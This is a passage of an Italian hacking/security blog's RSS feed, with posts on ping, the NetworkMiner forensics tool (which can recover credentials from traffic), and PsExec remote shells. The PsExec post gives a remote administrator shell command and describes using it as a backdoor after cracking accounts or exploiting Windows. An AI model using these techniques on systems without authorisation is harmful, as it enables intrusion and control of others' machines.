<p>Spero che questa spiegazione sia riuscita a chiarire alcuni aspetti di ping e del protocollo ICMP. Prossimamente ci addentreremo nei meandri della rete analizzando i protocolli e facendo a pezzi i pacchetti dati con Wireshark e affini.</p>
<!-- Social Bookmarking Reloaded BEGIN --><div class="social_bookmark"><em>Segnala presso:</em><br /><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://del.icio.us/post?url=http://www.pillolhacking.net/2010/03/10/come-funziona-ping/&amp;title=Come+Funziona+il+Comando+Ping%3F" title="Aggiungi 'Come Funziona il Comando Ping?' a Del.icio.us"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/delicious.png" title="Aggiungi 'Come Funziona il Comando Ping?' a Del.icio.us" alt="Aggiungi 'Come Funziona il Comando Ping?' a Del.icio.us" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://digg.com/submit?phase=2&amp;url=http://www.pillolhacking.net/2010/03/10/come-funziona-ping/&amp;title=Come+Funziona+il+Comando+Ping%3F" title="Aggiungi 'Come Funziona il Comando Ping?' a digg"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/digg.png" title="Aggiungi 'Come Funziona il Comando Ping?' a digg" alt="Aggiungi 'Come Funziona il Comando Ping?' a digg" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technorati.com/faves?add=http://www.pillolhacking.net/2010/03/10/come-funziona-ping/" title="Aggiungi 'Come Funziona il Comando Ping?' a Technorati"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technorati.png" title="Aggiungi 'Come Funziona il Comando Ping?' a Technorati" alt="Aggiungi 'Come Funziona il Comando Ping?' a Technorati" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.pillolhacking.net/2010/03/10/come-funziona-ping/&amp;title=Come+Funziona+il+Comando+Ping%3F" title="Aggiungi 'Come Funziona il Comando Ping?' a Google Bookmarks"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/google.png" title="Aggiungi 'Come Funziona il Comando Ping?' a Google Bookmarks" alt="Aggiungi 'Come Funziona il Comando Ping?' a Google Bookmarks" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://segnalo.alice.it/post.html.php?url=http://www.pillolhacking.net/2010/03/10/come-funziona-ping/&amp;title=Come+Funziona+il+Comando+Ping%3F" title="Aggiungi 'Come Funziona il Comando Ping?' a Segnalo"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/segnalo.png" title="Aggiungi 'Come Funziona il Comando Ping?' a Segnalo" alt="Aggiungi 'Come Funziona il Comando Ping?' a Segnalo" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://oknotizie.alice.it/post?url=http://www.pillolhacking.net/2010/03/10/come-funziona-ping/&amp;title=Come+Funziona+il+Comando+Ping%3F" title="Aggiungi 'Come Funziona il Comando Ping?' a OKnotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/oknotizie.gif" title="Aggiungi 'Come Funziona il Comando Ping?' a OKnotizie" alt="Aggiungi 'Come Funziona il Comando Ping?' a OKnotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.diggita.it/submit.php?title=Come+Funziona+il+Comando+Ping%3F&amp;url=http://www.pillolhacking.net/2010/03/10/come-funziona-ping/" title="Aggiungi 'Come Funziona il Comando Ping?' a Diggita"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/diggita.png" title="Aggiungi 'Come Funziona il Comando Ping?' a Diggita" alt="Aggiungi 'Come Funziona il Comando Ping?' a Diggita" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.facebook.com/share.php?u=http://www.pillolhacking.net/2010/03/10/come-funziona-ping/&amp;t=Come+Funziona+il+Comando+Ping%3F" title="Aggiungi 'Come Funziona il Comando Ping?' a FaceBook"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/facebook.png" title="Aggiungi 'Come Funziona il Comando Ping?' a FaceBook" alt="Aggiungi 'Come Funziona il Comando Ping?' a FaceBook" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.upnews.it/submit?url=http://www.pillolhacking.net/2010/03/10/come-funziona-ping/&amp;title=Come+Funziona+il+Comando+Ping%3F" title="Aggiungi 'Come Funziona il Comando Ping?' a Upnews"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/upnews.png" title="Aggiungi 'Come Funziona il Comando Ping?' a Upnews" alt="Aggiungi 'Come Funziona il Comando Ping?' a Upnews" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://notizieflash.com/submit.php?title=Come+Funziona+il+Comando+Ping%3F&amp;url=http://www.pillolhacking.net/2010/03/10/come-funziona-ping/" title="Aggiungi 'Come Funziona il Comando Ping?' a NotizieFlash"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/notizieflash.png" title="Aggiungi 'Come Funziona il Comando Ping?' a NotizieFlash" alt="Aggiungi 'Come Funziona il Comando Ping?' a NotizieFlash" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://twitter.com/home?status=http://www.pillolhacking.net/2010/03/10/come-funziona-ping/" title="Aggiungi 'Come Funziona il Comando Ping?' a Twitter"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/twitter.png" title="Aggiungi 'Come Funziona il Comando Ping?' a Twitter" alt="Aggiungi 'Come Funziona il Comando Ping?' a Twitter" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technotizie.it/posta_ok?action=f2&amp;title=Come+Funziona+il+Comando+Ping%3F&amp;url=http://www.pillolhacking.net/2010/03/10/come-funziona-ping/" title="Aggiungi 'Come Funziona il Comando Ping?' a Technotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technotizie.png" title="Aggiungi 'Come Funziona il Comando Ping?' a Technotizie" alt="Aggiungi 'Come Funziona il Comando Ping?' a Technotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://friendfeed.com/share/bookmarklet/frame#title=Come+Funziona+il+Comando+Ping%3F&amp;url=http://www.pillolhacking.net/2010/03/10/come-funziona-ping/" title="Aggiungi 'Come Funziona il Comando Ping?' a FriendFeed"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/friendfeed.png" title="Aggiungi 'Come Funziona il Comando Ping?' a FriendFeed" alt="Aggiungi 'Come Funziona il Comando Ping?' a FriendFeed" /></a></div>
<!-- Social Bookmarking Reloaded END -->]]></content:encoded>
			<wfw:commentRss>http://www.pillolhacking.net/2010/03/10/come-funziona-ping/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Network Forensics con NetworkMiner</title>
		<link>http://www.pillolhacking.net/2009/01/16/network-forensics-con-networkminer/</link>
		<comments>http://www.pillolhacking.net/2009/01/16/network-forensics-con-networkminer/#comments</comments>
		<pubDate>Fri, 16 Jan 2009 01:12:28 +0000</pubDate>
		<dc:creator>Angelo Righi</dc:creator>
				<category><![CDATA[Download]]></category>
		<category><![CDATA[Forensics]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Networking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[fingerprinting]]></category>

		<guid isPermaLink="false">http://www.pillolhacking.net/?p=230</guid>
		<description><![CDATA[NetworkMiner è un Network Forensics Analysis Tool per Windows. E&#8217; in grado di operare in tempo reale &#8220;sniffando&#8221; dati dalla rete in modo passivo, oppure è in grado di interpretare un file PCAP generato da uno sniffer o analizzatore di protocollo. Per Network Forensics Analysis Tool si intende uno strumento in grado di ricostruire sessioni [...]]]></description>
			<content:encoded><![CDATA[<p><a id="bf7p" title="NetworkMiner" href="http://networkminer.sourceforge.net/"></a><a id="bf7p" title="NetworkMiner" href="http://networkminer.sourceforge.net/">NetworkMiner</a> è un Network Forensics Analysis Tool per Windows. E&#8217; in grado di operare in tempo reale &#8220;sniffando&#8221; dati dalla rete in modo passivo, oppure è in grado di interpretare un file PCAP generato da uno sniffer o analizzatore di protocollo.</p>
<p>Per Network Forensics Analysis Tool si intende uno strumento in grado di ricostruire sessioni di networking dove poter trovare le prove di un reato (intrusione o qualsiasi altro incidente).</p>
<p>NetworkMiner può essere utilizzato anche per monitorare una rete alla ricerca di computer non autorizzati, ovvero computer che abusivamente utilizzano il network; è possibile inoltre trovare servizi non autorizzati (per esempio software p2p che vampirizzano la banda).</p>
<p>Le capacità di forensics permettono al programma di recuperare credenziali (nomi utente, password), url visitati e relativi parametri. NetworkMiner  è inoltre in grado di ricostruire i file trasferiti durante la sessione, permettendo all&#8217;investigatore di ottenere copia degli upload/download effettuati dal sospettato. Con questa funzione è possibile scoprire eventuali malware, e altro materiale illegale.</p>
<p>Un&#8217;altra caratteristica di NetworkMiner è la capacità di analizzare passivamente host remoti, riuscendo ad ottenere la lista delle porta Tcp aperte, e il tipo di sistema operativo (<a id="o8vw" title="fingerprinting" href="../2008/10/09/come-scoprire-il-sistema-operativo-remoto-con-un-solo-ping-e-un-pizzico-di-traceroute/">fingerprinting</a>).</p>
<p>Questo software (che è open-source) è versatile e può essere utilizzato sia in ambito security sia in ambito hacking/ethical hacking, e anche in ambito computer/network forensics.</p>
<p>Lo si può scaricare a questo indirizzo: <a id="xhog" title="http://networkminer.sourceforge.net/" href="http://networkminer.sourceforge.net/">http://networkminer.sourceforge.net/</a></p>
<!-- Social Bookmarking Reloaded BEGIN --><div class="social_bookmark"><em>Segnala presso:</em><br /><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://del.icio.us/post?url=http://www.pillolhacking.net/2009/01/16/network-forensics-con-networkminer/&amp;title=Network+Forensics+con+NetworkMiner" title="Aggiungi 'Network Forensics con NetworkMiner' a Del.icio.us"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/delicious.png" title="Aggiungi 'Network Forensics con NetworkMiner' a Del.icio.us" alt="Aggiungi 'Network Forensics con NetworkMiner' a Del.icio.us" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://digg.com/submit?phase=2&amp;url=http://www.pillolhacking.net/2009/01/16/network-forensics-con-networkminer/&amp;title=Network+Forensics+con+NetworkMiner" title="Aggiungi 'Network Forensics con NetworkMiner' a digg"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/digg.png" title="Aggiungi 'Network Forensics con NetworkMiner' a digg" alt="Aggiungi 'Network Forensics con NetworkMiner' a digg" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technorati.com/faves?add=http://www.pillolhacking.net/2009/01/16/network-forensics-con-networkminer/" title="Aggiungi 'Network Forensics con NetworkMiner' a Technorati"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technorati.png" title="Aggiungi 'Network Forensics con NetworkMiner' a Technorati" alt="Aggiungi 'Network Forensics con NetworkMiner' a Technorati" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.pillolhacking.net/2009/01/16/network-forensics-con-networkminer/&amp;title=Network+Forensics+con+NetworkMiner" title="Aggiungi 'Network Forensics con NetworkMiner' a Google Bookmarks"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/google.png" title="Aggiungi 'Network Forensics con NetworkMiner' a Google Bookmarks" alt="Aggiungi 'Network Forensics con NetworkMiner' a Google Bookmarks" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://segnalo.alice.it/post.html.php?url=http://www.pillolhacking.net/2009/01/16/network-forensics-con-networkminer/&amp;title=Network+Forensics+con+NetworkMiner" title="Aggiungi 'Network Forensics con NetworkMiner' a Segnalo"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/segnalo.png" title="Aggiungi 'Network Forensics con NetworkMiner' a Segnalo" alt="Aggiungi 'Network Forensics con NetworkMiner' a Segnalo" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://oknotizie.alice.it/post?url=http://www.pillolhacking.net/2009/01/16/network-forensics-con-networkminer/&amp;title=Network+Forensics+con+NetworkMiner" title="Aggiungi 'Network Forensics con NetworkMiner' a OKnotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/oknotizie.gif" title="Aggiungi 'Network Forensics con NetworkMiner' a OKnotizie" alt="Aggiungi 'Network Forensics con NetworkMiner' a OKnotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.diggita.it/submit.php?title=Network+Forensics+con+NetworkMiner&amp;url=http://www.pillolhacking.net/2009/01/16/network-forensics-con-networkminer/" title="Aggiungi 'Network Forensics con NetworkMiner' a Diggita"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/diggita.png" title="Aggiungi 'Network Forensics con NetworkMiner' a Diggita" alt="Aggiungi 'Network Forensics con NetworkMiner' a Diggita" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.facebook.com/share.php?u=http://www.pillolhacking.net/2009/01/16/network-forensics-con-networkminer/&amp;t=Network+Forensics+con+NetworkMiner" title="Aggiungi 'Network Forensics con NetworkMiner' a FaceBook"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/facebook.png" title="Aggiungi 'Network Forensics con NetworkMiner' a FaceBook" alt="Aggiungi 'Network Forensics con NetworkMiner' a FaceBook" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.upnews.it/submit?url=http://www.pillolhacking.net/2009/01/16/network-forensics-con-networkminer/&amp;title=Network+Forensics+con+NetworkMiner" title="Aggiungi 'Network Forensics con NetworkMiner' a Upnews"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/upnews.png" title="Aggiungi 'Network Forensics con NetworkMiner' a Upnews" alt="Aggiungi 'Network Forensics con NetworkMiner' a Upnews" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://notizieflash.com/submit.php?title=Network+Forensics+con+NetworkMiner&amp;url=http://www.pillolhacking.net/2009/01/16/network-forensics-con-networkminer/" title="Aggiungi 'Network Forensics con NetworkMiner' a NotizieFlash"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/notizieflash.png" title="Aggiungi 'Network Forensics con NetworkMiner' a NotizieFlash" alt="Aggiungi 'Network Forensics con NetworkMiner' a NotizieFlash" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://twitter.com/home?status=http://www.pillolhacking.net/2009/01/16/network-forensics-con-networkminer/" title="Aggiungi 'Network Forensics con NetworkMiner' a Twitter"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/twitter.png" title="Aggiungi 'Network Forensics con NetworkMiner' a Twitter" alt="Aggiungi 'Network Forensics con NetworkMiner' a Twitter" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technotizie.it/posta_ok?action=f2&amp;title=Network+Forensics+con+NetworkMiner&amp;url=http://www.pillolhacking.net/2009/01/16/network-forensics-con-networkminer/" title="Aggiungi 'Network Forensics con NetworkMiner' a Technotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technotizie.png" title="Aggiungi 'Network Forensics con NetworkMiner' a Technotizie" alt="Aggiungi 'Network Forensics con NetworkMiner' a Technotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://friendfeed.com/share/bookmarklet/frame#title=Network+Forensics+con+NetworkMiner&amp;url=http://www.pillolhacking.net/2009/01/16/network-forensics-con-networkminer/" title="Aggiungi 'Network Forensics con NetworkMiner' a FriendFeed"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/friendfeed.png" title="Aggiungi 'Network Forensics con NetworkMiner' a FriendFeed" alt="Aggiungi 'Network Forensics con NetworkMiner' a FriendFeed" /></a></div>
<!-- Social Bookmarking Reloaded END -->]]></content:encoded>
			<wfw:commentRss>http://www.pillolhacking.net/2009/01/16/network-forensics-con-networkminer/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Comandare Windows da Remoto con PsExec</title>
		<link>http://www.pillolhacking.net/2008/11/27/comandare-windows-da-remoto-con-psexec/</link>
		<comments>http://www.pillolhacking.net/2008/11/27/comandare-windows-da-remoto-con-psexec/#comments</comments>
		<pubDate>Thu, 27 Nov 2008 15:25:44 +0000</pubDate>
		<dc:creator>Angelo Righi</dc:creator>
				<category><![CDATA[Download]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Networking]]></category>
		<category><![CDATA[Risorse]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[Utilities]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.pillolhacking.net/2008/11/27/comandare-windows-da-remoto-con-psexec/</guid>
		<description><![CDATA[PsTools è il nome di una suite di comandi da linea di comando creati da Mark Russinovich. Già attivo e noto da anni come esperto di Windows e animatore del sito Sysinternal nel 2006 Russinovich passò armi e bagagli alla Microsoft, dove portò tutta la sua esperienza e i tools che aveva creato nel tempo. [...]]]></description>
			<content:encoded><![CDATA[<p>PsTools è il nome di una suite di comandi da linea di comando creati da <span style="font-size: x-small;">Mark Russinovich. Già attivo e noto da anni come esperto di Windows e animatore del sito </span><a id="j6u_" title="Sysinternal" href="http://en.wikipedia.org/wiki/Winternals">Sysinternal</a> nel 2006 <span style="font-size: x-small;">Russinovich passò armi e bagagli alla Microsoft, dove portò tutta la sua esperienza e i tools che aveva creato nel tempo.</span></p>
<p><span style="font-size: x-small;">La suite PsTools oggi reperibile sul sito </span><a id="s85f" title="Microsoft Technet" href="http://technet.microsoft.com/en-us/sysinternals/bb896649.aspx">Microsoft Technet</a> è un insieme di comandi per l&#8217;amministrazione di Windows ispirati al comando ps di Linux. Uno dei comandi più potenti è psexec, un programma che permette di eseguire programmi da remoto su una macchina di cui si ha l&#8217;accesso.<span style="font-size: x-small;"> </span></p>
<p>Con psexec si può accedere alla shell di Windows con molta semplicità: basta digitare il comando seguito dal nome del computer, il nome utente (con l&#8217;opzione -u), la password (opzione -p) e il comando da eseguire. Per esempio, io seguente comando:</p>

<div class="wp_syntax"><div class="code"><pre class="dos" style="font-family:monospace;">psexec \\192.168.132.128 -u administrator cmd.exe</pre></div></div>

<p>apre una shell di Windows con la quale interagire da remoto:</p>

<div class="wp_syntax"><div class="code"><pre class="dos" style="font-family:monospace;">PsExec v1.94 - Execute processes remotely
Copyright <span style="color: #33cc33;">(</span>C<span style="color: #33cc33;">)</span> 2001-2008 Mark Russinovich
Sysinternals - www.sysinternals.com
&nbsp;
Password:
&nbsp;
Microsoft Windows XP [Versione 5.1.2600]
<span style="color: #33cc33;">(</span>C<span style="color: #33cc33;">)</span> Copyright 1985-2001 Microsoft Corp.
&nbsp;
C:\WINDOWS\system32<span style="color: #33cc33;">&amp;</span>gt;</pre></div></div>

<p>PsExec è utile in diversi scenari:</p>
<ul>
<li><strong>Amministrazione</strong>: con psexec si possono fare tutte le cose che si possono fare con la linea di comando. Se avete una rete con diversi computer è il modo più semplice per accedere ai vari sistemi senza dover installareVNC o altri software di accesso remoto.</li>
</ul>
<ul>
<li><strong>Hacking</strong> l&#8217;hacker può accedere alla shell sfruttandola come backdoor, dopo avere ottenuto un accesso abusivo tramite il cracking degli account scoperti con la <a id="y5bi" title="Null Session" href="http://www.pillolhacking.net/2008/11/17/attaccare-windows-con-la-null-session/">Null Session</a> , oppure dopo essere riuscito ad entrare <a id="ay_p" title="tramite un exploit" href="http://www.pillolhacking.net/2008/11/26/hackerare-windows-con-metasploit/">tramite un exploit</a>, il recupero del SAM database e il cracking delle password.</li>
</ul>
<p>Con PsExec è possibile anche caricare un programma prima di eseguirlo utilizzando l&#8217;opzione -c nomeprogramma.</p>
<p>Cosa ci si può fare?</p>
<ul>
<li><strong>Spegnere il computer da remoto: </strong>con il comando shutdown (shutdown -s -t 0 per esempio).</li>
</ul>
<ul>
<li><strong>Aggiungere/Rimuovere utenti</strong>: con il comando net user.</li>
</ul>
<ul>
<li><strong>Avviare/Fermare servizi: </strong>con net start/stop.</li>
</ul>
<!-- Social Bookmarking Reloaded BEGIN --><div class="social_bookmark"><em>Segnala presso:</em><br /><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://del.icio.us/post?url=http://www.pillolhacking.net/2008/11/27/comandare-windows-da-remoto-con-psexec/&amp;title=Comandare+Windows+da+Remoto+con+PsExec" title="Aggiungi 'Comandare Windows da Remoto con PsExec' a Del.icio.us"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/delicious.png" title="Aggiungi 'Comandare Windows da Remoto con PsExec' a Del.icio.us" alt="Aggiungi 'Comandare Windows da Remoto con PsExec' a Del.icio.us" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://digg.com/submit?phase=2&amp;url=http://www.pillolhacking.net/2008/11/27/comandare-windows-da-remoto-con-psexec/&amp;title=Comandare+Windows+da+Remoto+con+PsExec" title="Aggiungi 'Comandare Windows da Remoto con PsExec' a digg"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/digg.png" title="Aggiungi 'Comandare Windows da Remoto con PsExec' a digg" alt="Aggiungi 'Comandare Windows da Remoto con PsExec' a digg" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technorati.com/faves?add=http://www.pillolhacking.net/2008/11/27/comandare-windows-da-remoto-con-psexec/" title="Aggiungi 'Comandare Windows da Remoto con PsExec' a Technorati"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technorati.png" title="Aggiungi 'Comandare Windows da Remoto con PsExec' a Technorati" alt="Aggiungi 'Comandare Windows da Remoto con PsExec' a Technorati" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.pillolhacking.net/2008/11/27/comandare-windows-da-remoto-con-psexec/&amp;title=Comandare+Windows+da+Remoto+con+PsExec" title="Aggiungi 'Comandare Windows da Remoto con PsExec' a Google Bookmarks"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/google.png" title="Aggiungi 'Comandare Windows da Remoto con PsExec' a Google Bookmarks" alt="Aggiungi 'Comandare Windows da Remoto con PsExec' a Google Bookmarks" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://segnalo.alice.it/post.html.php?url=http://www.pillolhacking.net/2008/11/27/comandare-windows-da-remoto-con-psexec/&amp;title=Comandare+Windows+da+Remoto+con+PsExec" title="Aggiungi 'Comandare Windows da Remoto con PsExec' a Segnalo"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/segnalo.png" title="Aggiungi 'Comandare Windows da Remoto con PsExec' a Segnalo" alt="Aggiungi 'Comandare Windows da Remoto con PsExec' a Segnalo" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://oknotizie.alice.it/post?url=http://www.pillolhacking.net/2008/11/27/comandare-windows-da-remoto-con-psexec/&amp;title=Comandare+Windows+da+Remoto+con+PsExec" title="Aggiungi 'Comandare Windows da Remoto con PsExec' a OKnotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/oknotizie.gif" title="Aggiungi 'Comandare Windows da Remoto con PsExec' a OKnotizie" alt="Aggiungi 'Comandare Windows da Remoto con PsExec' a OKnotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.diggita.it/submit.php?title=Comandare+Windows+da+Remoto+con+PsExec&amp;url=http://www.pillolhacking.net/2008/11/27/comandare-windows-da-remoto-con-psexec/" title="Aggiungi 'Comandare Windows da Remoto con PsExec' a Diggita"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/diggita.png" title="Aggiungi 'Comandare Windows da Remoto con PsExec' a Diggita" alt="Aggiungi 'Comandare Windows da Remoto con PsExec' a Diggita" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.facebook.com/share.php?u=http://www.pillolhacking.net/2008/11/27/comandare-windows-da-remoto-con-psexec/&amp;t=Comandare+Windows+da+Remoto+con+PsExec" title="Aggiungi 'Comandare Windows da Remoto con PsExec' a FaceBook"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/facebook.png" title="Aggiungi 'Comandare Windows da Remoto con PsExec' a FaceBook" alt="Aggiungi 'Comandare Windows da Remoto con PsExec' a FaceBook" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.upnews.it/submit?url=http://www.pillolhacking.net/2008/11/27/comandare-windows-da-remoto-con-psexec/&amp;title=Comandare+Windows+da+Remoto+con+PsExec" title="Aggiungi 'Comandare Windows da Remoto con PsExec' a Upnews"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/upnews.png" title="Aggiungi 'Comandare Windows da Remoto con PsExec' a Upnews" alt="Aggiungi 'Comandare Windows da Remoto con PsExec' a Upnews" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://notizieflash.com/submit.php?title=Comandare+Windows+da+Remoto+con+PsExec&amp;url=http://www.pillolhacking.net/2008/11/27/comandare-windows-da-remoto-con-psexec/" title="Aggiungi 'Comandare Windows da Remoto con PsExec' a NotizieFlash"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/notizieflash.png" title="Aggiungi 'Comandare Windows da Remoto con PsExec' a NotizieFlash" alt="Aggiungi 'Comandare Windows da Remoto con PsExec' a NotizieFlash" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 